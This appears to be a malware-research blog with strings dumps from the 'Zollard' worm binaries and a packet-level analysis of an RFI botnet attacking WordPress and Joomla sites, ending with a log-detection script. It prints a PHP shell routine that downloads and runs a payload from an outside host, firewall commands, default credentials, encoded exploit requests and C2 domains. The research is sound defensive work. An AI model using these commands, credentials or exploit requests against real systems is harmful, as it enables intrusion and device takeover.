The two listings above are the strings from the 'arm' file and the 'mips' file, respectively.

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
The two listings above are the strings from the 'mipsel' file and the 'ppc' file, respectively.
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
The listing above is the strings from the 'x86' file.

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. 

Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are performed by automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners often get alerted about copious amounts of meds and porn spam emanating from their sites). This is also the source of the varied links used in that spam: thousands of different links redirecting to the same sites (e.g. weight loss, work-at-home scams, or porn sites).

The "hackers" attacking the Wordpress servers are armies of compromised Windows desktops continuously checking the C&C servers for new targets. This is why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server; it's much harder to discover how the server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with the domain www.wholists.org.

The unpacked version of conhost.exe (7958F73DAF4B84E3B00E008258EA2E7A) contains a Base94 alphabet, which is used for encoding strings and communication requests in addition to ordinary Base64:

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

1. Examining the pcap shows the initial callback to 'www.wholists.org' on 95.163.104.69:

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org', where it requests 'conh11.jpg' for download. Despite the extension, the file is actually a Win32 executable rather than a JPG. It has hash value 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal:
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3. Next, our bot sends a GET request for "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET for ae1.php to bt.ads-runner.org on 208.115.109.53:
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected into a vulnerable server. We link here to the PHP scripts we saw in use by this malware. The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site:
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits.  After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads.  By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- "OK" followed by the MD5 hash of 1234567890
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].org
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
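As an added example (not part of the original post), the following Python flags the exploit pattern documented above in Apache combined-format access logs: POSTs to the three Joomla component paths seen in the captures, sent with the bot's bare "Mozilla/5.0" or "-" User-Agent. It also reproduces the "OK<md5>+0" success marker from response example 1 so it can be matched in captured response bodies. The log lines are constructed, with RFC 5737 documentation addresses standing in for client IPs.

```python
import hashlib
import re

# Joomla component paths the bot POSTed its payloads to (from the captures above).
TARGETED_PATHS = (
    "/administrator/components/com_akeeba/assets/javascript.php",
    "/plugins/editors/jce/libraries/classes/json/defines.php",
    "/plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php",
)
# The bot used only these two fixed User-Agent strings in the pcap.
BOT_USER_AGENTS = ("Mozilla/5.0", "-")

# Success marker returned by an exploited host: "OK" + md5("1234567890") + "+0".
SUCCESS_MARKER = "OK" + hashlib.md5(b"1234567890").hexdigest() + "+0"

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def flag_exploit_attempts(log_lines):
    """Return (client_ip, path, status) for each request matching the bot's pattern."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]          # drop any query string
        # endswith() so a CMS installed under a sub-directory still matches
        if path.endswith(TARGETED_PATHS) and m["ua"] in BOT_USER_AGENTS:
            hits.append((m["ip"], path, int(m["status"])))
    return hits

def is_success_marker(body: str) -> bool:
    """True if a response body is the bot's success marker (response example 1)."""
    return body.strip() == SUCCESS_MARKER

# Constructed sample log lines (203.0.113.x / 198.51.100.x are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2013:03:27:21 +0000] "POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/May/2013:03:27:21 +0000] "POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1" 406 226 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [27/May/2013:03:28:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
    '198.51.100.2 - - [27/May/2013:03:28:03 +0000] "POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1" 200 120 "http://www.example.org/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/21.0"',
]

if __name__ == "__main__":
    for hit in flag_exploit_attempts(SAMPLE_LOG):
        print(hit)
```

The fourth sample line hits a targeted path but carries a full browser User-Agent, so it is not flagged; the bot's unusually short UA strings are part of the signature.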



Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure.


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

95.163.104.69 95.163.104.94 46.165.230.185 208.115.109.53 85.143.166.221
www.wholists.org ns1.wholists.org ns1.upsave.info ntp.run-stat.org fw.point-up.org
bns.wholists.org ns1.store-apps.org fw.stat-run.info bt.ads-runner.org ns2.memrem.ru
gjd.wholists.org ns1.games-olympic.org fw.run-stat.org sk4.ads-runner.org ns2.nalkanet.ru
lbh.wholists.org ns1.googleminiapi.com mail.stat-run.info ntp.stat-run.info ns2.nallanite.ru
qdp.wholists.org peace.vijproject.com bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org sogood.vitaminavip.com jc.upsave.info

ml.inviteyou.info img.stat-run.info ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.

95.163.104.69 & 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013

In January, we see that for the prefix 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May they added AS31133.

AS3216 - SOVAM-AS OJSC Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013

For the prefix 208.115.109.0/24, Wowrack's primary upstream is AS11404 (AS-VOBIZ - vanoppen.biz LLC).
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013

In January, for the prefix 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534